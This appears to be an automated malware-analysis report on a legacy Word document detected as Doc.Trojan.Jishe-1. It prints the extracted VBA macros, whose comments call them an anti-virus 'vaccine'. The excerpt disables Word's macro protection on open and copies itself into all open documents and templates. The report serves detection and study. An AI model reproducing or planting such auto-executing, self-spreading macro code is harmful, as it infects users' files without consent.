Office (OLE) malware analysis — malicious · 6b44ff65e6f5a19c

MALICIOUS

Office (OLE)

72.0 KB Created: 2001-05-03 02:34:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: dd33dd082f64fb00aba5a47d211c7a80 SHA-1: 8cb3a45ea83357fd5a30cf5f1bf97728512b741d SHA-256: 6b44ff65e6f5a19cbfab0d249e929c104f69ea82249513be4bec54a099f6536c

200 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file contains legacy WordBasic and VBA macros, including AutoOpen and Document_Open, indicating malicious intent. The document body is presented as an official notification about technical innovation projects, a common lure to trick users into enabling macros. The presence of these macros and the ClamAV detection strongly suggest a malicious document designed to execute arbitrary code upon opening.

Heuristics 5

ClamAV: Doc.Trojan.Jishe-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Jishe-1
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46041 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	46041 bytes
SHA-256: `7ef35b57547ffbd74c27222bd720df74d76fe50c85f1b8d9258faa47990f21e3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True '这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染 '这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒 '感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力 '与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力 '欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士 '程序设计: 冀慎华 '办公电话: '伊妹地址: club@263.net Const answer0 = "FreeWordMacroVirusKiller" '保持与以前版本的兼容性 Const answer1 = "MyMacroVirusKillerV1.0" Const answer2 = "MyMacroVirusKillerV2.0" Const answer3 = "MyMacroVirusKillerV2.2" '本程序标志 'Version 2.0 Private Sub Document_Open() CloseVirusProtection '检查打开的文档中是否有病毒 If ScanVirus Then Load VirusReport VirusReport.Show Else InfectAll End If End Sub Attribute VB_Name = "JiShenhua" '这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染 '这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒 '感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力 '与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力 '欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士 '程序设计: 冀慎华 '办公电话: '伊妹地址: club@263.net Option Explicit '程序中的变量必须先定义后使用 Public pVirusReport As String '病毒描述信息 Private Const cMyID As String = "MyMacroVirusKiller" '本程序代码标志 Private Const cMyVersion As String = "V2.2" '本程序版本标准 Private Const cMyModule As String = "JiShenhua" '本程序的模块名称 Private Const cMyUserForm As String = "VirusReport" '本程序的用户窗口名称 Private Const cLinesofThisDocument As Integer = 24 '在ThisDocument模块中全部代码的行数 Private Const cOK As Integer = 0 '一切正常 Private Const cDocHasModuleElse As Integer = 1 '有其他模块存在 Private Const cDocHasCodeElse As Integer = 2 '在ThisDocument模块中有其他代码存在 Private Const cDocHasAllElse As Integer = 3 '在ThisDocument模块中有其他代码存在，并有其他模块存在 Private Const cDocProtected As Integer = 4 '该文档被保护 Private Const cDocHasOldVersion As Integer = 8 '该文档中有旧版本该杀病毒模块 '打开文档时自动执行 Sub AutoOpen() CloseVirusProtection '检查打开的文档中是否有病毒,如果有病毒，向用户提出报告 If ScanVirus Then Load VirusReport VirusReport.Show Else InfectAll End If End Sub '新建文档时自动执行 Sub AutoNew() CloseVirusProtection Infect Word.ActiveDocument End Sub '关闭WORD之前清理autoexec.dot文件中的病毒 Sub AutoExit() Const AutoDotFile = "C:\AUTOEXEC.DOT" If Dir(AutoDotFile) <> "" Then Kill AutoDotFile End If End Sub '从指定文件中向所有打开文档及模板中复制本程序代码及模块 Public Function InfectAll() As Boolean Dim myDoc As Document, myTemp As Template '向打开的文档中写入本代码 For Each myDoc In Documents Infect myDoc Next myDoc '向WORD模板中写入本代码 For Each myTemp In Templates Infect myTemp Next myTemp InfectAll = True End Function '清除所有打开文档及模板中的病毒模块及代码 Public Function ClearVirus() As Boolean Dim myDoc As Document, myTemp As Template Dim Cleared As Boolean ClearVirus = True '检查所有文档并清除 For Each myDoc In Documents Cleared = ClearDocument(myDoc) If Not Cleared Then MsgBox "病毒清除工作不成功，请检查原因。", vbOKOnly, myDoc.Name ClearVirus = False End If Next myDoc '检查所有模板并清除 For Each myTemp In Templates Cleared = ClearDocument(myTemp) If Not Cleared Then MsgBox "病毒清除工作不成功，请检查原因。", vbOKOnly, myTemp.Name ClearVirus = False End If Next myTemp End Function '检查所有打开的文档及模板中是否有病毒存在，如果有，返回病毒信息描述字符串 Public Function ScanVirus() As Boolean Dim Ret As Integer, myDoc As Document, myTemp As Template ScanVirus = False pVirusReport = "" '检查所有打开的文档中是否有病毒 For Each myDoc In Documents Ret = ScanDocument(myDoc) Select Case Ret Case cOK, cDocProtected Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse, cDocHasOldVersion ScanVirus = True Case Else MsgBox "函数ScanDocument返回错误代码，系统无法识别。", vbOKOnly, "系统出错" End Select Next myDoc '检查所有模板 For Each myTemp In Templates Ret = ScanDocument(myTemp) Select Case Ret Case cOK, cDocProtected ... (truncated)

SHA-256: 7ef35b57547ffbd74c27222bd720df74d76fe50c85f1b8d9258faa47990f21e3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染
'这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒
'感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力
'与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力
'欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士
'程序设计: 冀慎华
'办公电话:
'伊妹地址: club@263.net
Const answer0 = "FreeWordMacroVirusKiller" '保持与以前版本的兼容性
Const answer1 = "MyMacroVirusKillerV1.0"
Const answer2 = "MyMacroVirusKillerV2.0"
Const answer3 = "MyMacroVirusKillerV2.2" '本程序标志
'Version 2.0
Private Sub Document_Open()
    CloseVirusProtection
    '检查打开的文档中是否有病毒
    If ScanVirus Then
        Load VirusReport
        VirusReport.Show
    Else
        InfectAll
    End If
End Sub

Attribute VB_Name = "JiShenhua"
'这是本人学习制作的一个宏病毒防杀程序,它可以防止部分WORD宏病毒的感染
'这需要有大量的宏病毒特征码作为依据,如果你发现有本疫苗无能为力的宏病毒
'感谢您及时与我联系,你也可以自选修改本程序,以加强本疫苗的功力
'与病毒作斗争就如同抵御社会犯罪,需要大家的共同努力
'欢迎加入其中并成为一名战士,也许你正是大家期待已久的勇士
'程序设计: 冀慎华
'办公电话:
'伊妹地址: club@263.net
Option Explicit '程序中的变量必须先定义后使用
Public pVirusReport As String '病毒描述信息
Private Const cMyID As String = "MyMacroVirusKiller" '本程序代码标志
Private Const cMyVersion As String = "V2.2" '本程序版本标准
Private Const cMyModule As String = "JiShenhua" '本程序的模块名称
Private Const cMyUserForm As String = "VirusReport" '本程序的用户窗口名称
Private Const cLinesofThisDocument As Integer = 24 '在ThisDocument模块中全部代码的行数
Private Const cOK As Integer = 0 '一切正常
Private Const cDocHasModuleElse As Integer = 1 '有其他模块存在
Private Const cDocHasCodeElse As Integer = 2 '在ThisDocument模块中有其他代码存在
Private Const cDocHasAllElse As Integer = 3 '在ThisDocument模块中有其他代码存在，并有其他模块存在
Private Const cDocProtected As Integer = 4 '该文档被保护
Private Const cDocHasOldVersion As Integer = 8  '该文档中有旧版本该杀病毒模块
'打开文档时自动执行
Sub AutoOpen()
    CloseVirusProtection
    '检查打开的文档中是否有病毒,如果有病毒，向用户提出报告
    If ScanVirus Then
        Load VirusReport
        VirusReport.Show
    Else
        InfectAll
    End If
End Sub
'新建文档时自动执行
Sub AutoNew()
    CloseVirusProtection
    Infect Word.ActiveDocument
End Sub
'关闭WORD之前清理autoexec.dot文件中的病毒
Sub AutoExit()
    Const AutoDotFile = "C:\AUTOEXEC.DOT"
    If Dir(AutoDotFile) <> "" Then
        Kill AutoDotFile
    End If
End Sub
'从指定文件中向所有打开文档及模板中复制本程序代码及模块
Public Function InfectAll() As Boolean
    Dim myDoc As Document, myTemp As Template
    '向打开的文档中写入本代码
    For Each myDoc In Documents
        Infect myDoc
    Next myDoc
    '向WORD模板中写入本代码
    For Each myTemp In Templates
        Infect myTemp
    Next myTemp
    InfectAll = True
End Function
'清除所有打开文档及模板中的病毒模块及代码
Public Function ClearVirus() As Boolean
    Dim myDoc As Document, myTemp As Template
    Dim Cleared As Boolean
    
    ClearVirus = True
    '检查所有文档并清除
    For Each myDoc In Documents
        Cleared = ClearDocument(myDoc)
        If Not Cleared Then
            MsgBox "病毒清除工作不成功，请检查原因。", vbOKOnly, myDoc.Name
            ClearVirus = False
        End If
    Next myDoc
    '检查所有模板并清除
    For Each myTemp In Templates
        Cleared = ClearDocument(myTemp)
        If Not Cleared Then
            MsgBox "病毒清除工作不成功，请检查原因。", vbOKOnly, myTemp.Name
            ClearVirus = False
        End If
    Next myTemp
End Function
'检查所有打开的文档及模板中是否有病毒存在，如果有，返回病毒信息描述字符串
Public Function ScanVirus() As Boolean
    Dim Ret As Integer, myDoc As Document, myTemp As Template
    
    ScanVirus = False
    pVirusReport = ""
    '检查所有打开的文档中是否有病毒
    For Each myDoc In Documents
        Ret = ScanDocument(myDoc)
        Select Case Ret
            Case cOK, cDocProtected
            Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse, cDocHasOldVersion
                ScanVirus = True
            Case Else
                MsgBox "函数ScanDocument返回错误代码，系统无法识别。", vbOKOnly, "系统出错"
        End Select
    Next myDoc
    '检查所有模板
    For Each myTemp In Templates
        Ret = ScanDocument(myTemp)
        Select Case Ret
            Case cOK, cDocProtected
 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.